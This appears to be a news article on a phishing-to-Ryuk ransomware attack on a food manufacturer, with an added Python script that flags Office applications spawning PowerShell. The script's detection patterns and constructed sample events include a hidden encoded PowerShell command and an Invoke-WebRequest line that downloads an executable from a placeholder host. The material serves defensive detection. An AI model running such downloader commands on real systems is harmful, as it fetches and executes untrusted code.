Skipping security updates can have dire consequences
Security experts have provided an insight into how a targeted ransomware attack has taken a food and beverage manufacturer’s network down after hackers managed to exploit common security vulnerabilities.
The malicious actors used a phishing attack method to take advantage of vulnerabilities in old hardware, default passwords, and many other weaknesses in order to introduce Emotet and Trickbot Malware into the compromised system. After doing so, the crooks managed to deliver a ransomware called Ryuk, encrypt the victim’s network and demand a ransom to restore access.
Fortunately, the affected organization quickly called in security experts to investigate the case and restore functionality, and it did not pay the ransom the criminals demanded. Sadly, many organizations in a rush to restore their operations are more likely to agree to the ransom demand, especially if they don’t have IT staff at hand.
AT&T Cybersecurity was called in to examine the attack and help the unidentified manufacturer handle the incident without paying a ransom, while suffering the least possible disruption. But if some basic security measures had been applied from the start, the business would likely not have fallen victim to ransomware through such simple security vulnerabilities.
Ransomware threats like Ryuk are usually deployed in the final stage of a multi-step attack that first introduces other malware – typically a botnet loader like Emotet and a powerful multipurpose Trojan like Trickbot.
Many multi-step ransomware campaigns target exposed remote-access ports; in the described case, however, the infection started with a phishing attack. According to the AT&T researchers, the targeted user received a Microsoft Word document labeled as an invoice. When the user opened the document, it executed malicious code through a PowerShell command that silently downloaded the Emotet payload onto the system.
The attack might have been stopped at this point if PowerShell had been disabled for the users who don’t need it, experts from the security firm explain.
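The step just described (a Word document launching PowerShell to fetch a payload) leaves a characteristic trace in process-creation logs: an Office application as the parent of powershell.exe, usually with downloader-style switches on the command line. The following is an added example of detection logic for that trace; it is not code from the article or from AT&T Cybersecurity. The pipe-separated event format and its field names are a constructed simplification, not any vendor's real schema, and the sample events are constructed as well. It generalizes slightly beyond the article: it also flags cmd.exe and other script hosts spawned by Office, and PowerShell launched from any parent when several downloader indicators appear together.

```python
"""Flag Office-to-PowerShell process chains and downloader-style PowerShell
command lines in constructed process-creation events.

Event format (constructed, one event per line):
    timestamp|user|parent_image|image|command_line
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Office applications that have no business launching a shell or script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Child processes whose launch from an Office parent is suspicious on its own.
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe",
                       "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments typical of a PowerShell downloader stage.
DOWNLOAD_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"-enc(odedcommand)?\b",                 # base64-encoded script body
    r"downloadstring|downloadfile",          # Net.WebClient fetch
    r"invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b",
    r"-nop\b|-noprofile\b",                  # skip profile (quiet start)
    r"-w(indowstyle)?\s+hidden",             # hide the console window
    r"bypass",                               # -ExecutionPolicy Bypass
)]


@dataclass
class Finding:
    timestamp: str
    user: str
    parent: str
    child: str
    reasons: List[str]


def parse_event(line: str) -> dict:
    """Split one constructed 'ts|user|parent|image|cmdline' record."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        raise ValueError(f"malformed event: {line!r}")
    ts, user, parent, image, cmdline = parts
    return {"ts": ts, "user": user, "parent": parent,
            "image": image, "cmdline": cmdline}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> Optional[Finding]:
    """Return a Finding if either detection rule fires, else None."""
    parent, child = basename(event["parent"]), basename(event["image"])
    reasons = []
    # Rule A: Office application spawning a shell / script host.
    if parent in OFFICE_PARENTS and child in SUSPICIOUS_CHILDREN:
        reasons.append(f"{parent} spawned {child}")
    # Rule B: PowerShell with two or more downloader indicators, any parent.
    if child in {"powershell.exe", "pwsh.exe"}:
        hits = [p.pattern for p in DOWNLOAD_PATTERNS if p.search(event["cmdline"])]
        if len(hits) >= 2:
            reasons.append("downloader-style PowerShell switches: " + ", ".join(hits))
    if not reasons:
        return None
    return Finding(event["ts"], event["user"], parent, child, reasons)


def scan(lines) -> List[Finding]:
    """Evaluate every non-empty event line and collect the findings."""
    return [f for f in (evaluate(parse_event(l)) for l in lines if l.strip()) if f]


# Constructed sample events; hosts, users and the base64 blob are placeholders.
SAMPLE_EVENTS = [
    r'2020-03-02T09:12:03Z|ACME\jdoe|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -nop -w hidden -enc QUJDREVGR0g=',
    r'2020-03-02T09:15:41Z|ACME\jdoe|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -NoProfile -Command Get-Date',
    r'2020-03-02T10:00:00Z|ACME\svc_backup|C:\Windows\System32\svchost.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1',
    r'2020-03-02T10:07:19Z|ACME\asmith|C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|C:\Windows\System32\cmd.exe|cmd /c echo hi',
    r'2020-03-02T10:09:55Z|ACME\jdoe|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe',
    r'2020-03-02T11:30:02Z|ACME\bob|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -c "Invoke-WebRequest http://example.invalid/update -OutFile C:\Users\Public\u.exe"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.timestamp} {f.user}: {f.parent} -> {f.child}; " + "; ".join(f.reasons))
```

Rule A fires on the article's exact scenario regardless of what the command line looks like, which is why it needs no indicator threshold; Rule B requires two indicators so that an administrator's routine `-NoProfile` or `-ExecutionPolicy Bypass -File` run from a legitimate parent is not flagged on its own. On the constructed sample, events 1, 4 and 6 produce findings and the others do not.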
After Emotet’s intrusion, the second stage of the attack continued with the introduction of Trickbot malware, whose aim was to steal login credentials for business accounts and cloud services so that the crooks could gain access to other parts of the network.
Using this two-step methodology, the cyber criminals can typically gain control over a major portion of the network before delivering the ransomware. The ultimate goal is to make the most of the attack and lock up as much crucial data as possible in order to bring the attacked organization to its knees and extort money.
In such an event, response time and the ability to quickly handle the incident are of utmost importance so that the company can regain access to its critical data and start operating again. The downtime and the network repairs come as an aftermath, along with efforts towards future protection so that attackers don’t strike again.
Many companies, however, suffer cyber attacks because they don’t take the necessary measures to avoid becoming a ransomware target. One of the simple solutions that experts suggest is to ensure that information security hygiene is well in place: simple weaknesses that attackers may take advantage of should be eliminated in a timely manner, and external data backup copies should be created on a regular basis.
The vulnerabilities that threats like Emotet, Trickbot and Ryuk use are well known, as these are not new threats. Moreover, security updates that address them have been available for a long time. Unfortunately, even though such fixes have existed for years, there are still organizations that do not implement them.
The AT&T researchers add that such attacks could easily be avoided if strong passwords and multi-factor authentication were used. However, it seems that patch management and protection hygiene remain a challenge for many organizations.
Still, most security professionals will agree that prevention is the better way to deter cyber attacks: not only does it protect the company from falling prey to ransomware or other malware, but it would almost certainly cost less than dealing with the consequences of an attack, especially one that causes operational harm that could keep the company from running or turn customers away.